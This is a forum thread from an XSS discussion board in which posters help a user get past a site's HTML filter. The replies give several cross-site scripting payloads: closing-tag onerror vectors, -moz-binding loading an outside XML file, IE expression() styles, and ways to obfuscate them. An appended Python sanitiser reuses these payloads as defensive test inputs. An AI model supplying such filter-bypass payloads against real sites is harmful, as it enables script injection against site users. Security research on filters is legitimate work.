Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
XSS in closing tags?
Posted by: mjmorrell
Date: November 05, 2009 06:26PM

I have been trying to find a hole in this one filter, and I have noticed that they obviously don't allow tags like <script>, <video>, etc. But you can have closing tags like </script> and </video>.

Can you do anything with this?

Re: XSS in closing tags?
Posted by: sirdarckcat
Date: November 06, 2009 12:28AM

on IE you could, but not anymore, and on HTML5 you will be able to do it..

so, either travel to the future or travel to the past.. :)

greetz

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: XSS in closing tags?
Posted by: Anonymous User
Date: November 06, 2009 02:01AM

x</p<img src=x onerror=alert(1)//>y or x</br<img src=x onerror=alert(2)//>y might help. Works on...

a) no browser at all
b) what is a browser?
c) Firefox of course <-- right answer!

:)

Greetings,
.mario

EDIT: Ah - and you might find this one interesting too: http://pastebin.com/f14dbfdb0



Edited 1 time(s). Last edit at 11/06/2009 02:07AM by .mario.

Re: XSS in closing tags?
Posted by: Gareth Heyes
Date: November 06, 2009 02:51AM

How about other tags?

<xml onreadystatechange=alert(1)>test</xml>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: XSS in closing tags?
Posted by: mjmorrell
Date: November 06, 2009 06:36PM

Browser doesn't matter, FF 2/3, IE7+, as long as it works on one is all that I would care.

The filter is one that pretty much only allows certain tags so <xml> doesn't work.

Also, "on*" is blocked so no event handling.

expression( is also blocked

I am out of ideas other than the closing tag

Re: XSS in closing tags?
Posted by: thornmaker
Date: November 06, 2009 07:48PM

Firefox 2 lets you use style attributes with -moz-binding to execute JS. Something like... style="-moz-binding:url('http://ha.ckers.org/xssmoz.xml#xss')" if I recall correctly.

older versions of IE (7 and before I think) let you do something similar using expressions.... e.g. style="x:expression(alert('XSS'))"

[edit]: there are quite a few weird vectors that work on older browsers... have you looked at the cheat sheet?



Edited 1 time(s). Last edit at 11/06/2009 07:53PM by thornmaker.

Re: XSS in closing tags?
Posted by: sirdarckcat
Date: November 06, 2009 10:27PM

on IE6 you can use expression using best fit mapping chars, and you should really try ex/**/pression and stuff.. if they do detect it, try \e\x\p\r\e\s\s\i\o\n and if they also detect it, try HTML Entitifying it, and if they also detect it, make the entities malformed..

greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: XSS in closing tags?
Posted by: Anonymous User
Date: November 06, 2009 11:30PM

Can we have a look at the site/an example URI? PM? Or is it super super secret?

Re: XSS in closing tags?
Posted by: mikefree
Date: November 21, 2009 05:12PM

Yeah,
a URI would be great!

greetings
Mike!

Re: XSS in closing tags?
Posted by: Ivan
Date: May 21, 2010 02:45PM

I have something like this:

<td>lorem ipsum</td ##this can be controlled## >

I can't use < in ##this can be controlled##.


What browser version and attack vector can be used here?



Thanks,
Ivan

http://www.security-net.biz/

Re: XSS in closing tags?
Posted by: Anonymous User
Date: May 21, 2010 04:34PM

<td>lorem ipsum</td style="x:expression(write(1))">

IE5.5-6,7 8 in non-std mode
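
Added example, not part of any post in this thread: the filter discussed above checks opening tags but passes closing tags through, so anything after the closing tag's name reaches the browser. The sketch below holds closing tags to the same exact-match allowlist as opening tags and entity-encodes everything else; the `ALLOWED_TAGS` contents and the `sanitize` name are assumptions made for illustration.

```python
import html
import re

# Assumed allowlist for this example; the thread never lists the filter's tags.
ALLOWED_TAGS = {"b", "i", "p", "br", "table", "tr", "td"}

# Only <name>, <name/> and </name> count as tags: no attributes, no nested '<',
# nothing between the tag name and the closing '>'.
BARE_TAG = re.compile(r"<(/?)([A-Za-z][A-Za-z0-9]*)\s*(/?)>")


def sanitize(fragment: str) -> str:
    """Re-emit bare allowlisted tags; entity-encode every other character run."""
    out, pos = [], 0
    for m in BARE_TAG.finditer(fragment):
        closing, name, self_closing = m.group(1), m.group(2).lower(), m.group(3)
        out.append(html.escape(fragment[pos:m.start()], quote=True))
        if name in ALLOWED_TAGS and not (closing and self_closing):
            # Rebuild the tag from its name instead of copying the input bytes.
            out.append(f"<{closing}{name}>")
        else:
            out.append(html.escape(m.group(0), quote=True))
        pos = m.end()
    out.append(html.escape(fragment[pos:], quote=True))
    return "".join(out)


# Inputs quoted from the posts above, plus one benign constructed fragment.
SAMPLES = [
    "<td>lorem ipsum</td>",
    '<td>lorem ipsum</td style="x:expression(write(1))">',
    "x</p<img src=x onerror=alert(1)//>y",
    "<xml onreadystatechange=alert(1)>test</xml>",
    "</script>",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{sample!r:60} -> {sanitize(sample)!r}")
```

Input is treated as text, so entities already present in it are encoded again and display literally.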
